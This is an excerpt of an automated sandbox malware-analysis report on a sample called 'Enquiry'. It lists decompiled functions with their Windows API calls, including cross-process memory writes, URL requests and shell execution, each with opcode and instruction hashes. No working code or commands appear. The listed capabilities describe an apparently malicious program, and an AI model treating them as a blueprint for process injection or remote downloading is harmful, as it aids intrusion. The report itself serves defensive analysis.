                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                            • String ID:
                            • API String ID: 1042038666-0
                            • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                            • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                            • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                            • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Path$ObjectStroke$DeleteFillSelect
                            • String ID:
                            • API String ID: 2625713937-0
                            • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                            • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                            • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                            • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                            APIs
                            • __getptd.LIBCMT ref: 0041780F
                              • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                              • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                            • __getptd.LIBCMT ref: 00417826
                            • __amsg_exit.LIBCMT ref: 00417834
                            • __lock.LIBCMT ref: 00417844
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                            • String ID:
                            • API String ID: 938513278-0
                            • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                            • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                            • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                            • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                            APIs
                              • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                            • ___set_flsgetvalue.LIBCMT ref: 00413D20
                              • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                              • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                            • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                              • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                            • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                            • ExitThread.KERNEL32 ref: 00413D4E
                            • GetCurrentThreadId.KERNEL32 ref: 00413D54
                            • __freefls@4.LIBCMT ref: 00413D74
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                            • String ID:
                            • API String ID: 2403457894-0
                            • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                            • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                            • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                            • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                            APIs
                              • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                            • ___set_flsgetvalue.LIBCMT ref: 004151C0
                              • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                              • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                            • ___fls_getvalue@4.LIBCMT ref: 004151CB
                              • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                            • ___fls_setvalue@8.LIBCMT ref: 004151DD
                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                            • ExitThread.KERNEL32 ref: 004151ED
                            • __freefls@4.LIBCMT ref: 00415209
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                            • String ID:
                            • API String ID: 4247068974-0
                            • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                            • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                            • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                            • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID:
                            • String ID: )$U$\
                            • API String ID: 0-3705770531
                            • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                            • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                            • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                            • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                            APIs
                              • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                            • CoInitialize.OLE32(00000000), ref: 0046E505
                            • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                            • CoUninitialize.OLE32 ref: 0046E53D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                            • String ID: .lnk
                            • API String ID: 886957087-24824748
                            • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                            • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                            • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                            • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                            Strings
                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                            • API String ID: 708495834-557222456
                            • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                            • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                            • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                            • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                            APIs
                              • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                            • CoInitialize.OLE32(00000000), ref: 00478442
                            • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                            • CoUninitialize.OLE32 ref: 0047863C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                            • String ID: .lnk
                            • API String ID: 886957087-24824748
                            • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                            • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                            • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                            • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                            APIs
                              • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                              • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                              • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                              • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                              • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                            • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                            • String ID: @
                            • API String ID: 4150878124-2766056989
                            • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                            • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                            • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                            • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID: \$]$h
                            • API String ID: 4104443479-3262404753
                            • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                            • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                            • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                            • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                            APIs
                            • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                            • CloseHandle.KERNEL32(?), ref: 00457E09
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                            • String ID: <$@
                            • API String ID: 2417854910-1426351568
                            • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                            • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                            • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                            • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                            APIs
                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                              • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                            • String ID:
                            • API String ID: 3705125965-3916222277
                            • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                            • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                            • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                            • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                            APIs
                            • GetMenuItemInfoW.USER32 ref: 0045FAC4
                            • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                            • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Menu$Delete$InfoItem
                            • String ID: 0
                            • API String ID: 135850232-4108050209
                            • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                            • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                            • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                            • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                            APIs
                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                            • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Window$Long
                            • String ID: SysTreeView32
                            • API String ID: 847901565-1698111956
                            • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                            • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                            • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                            • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                            APIs
                            • LoadLibraryA.KERNEL32(?), ref: 00434B10
                            • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                            • FreeLibrary.KERNEL32(?), ref: 00434B9F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
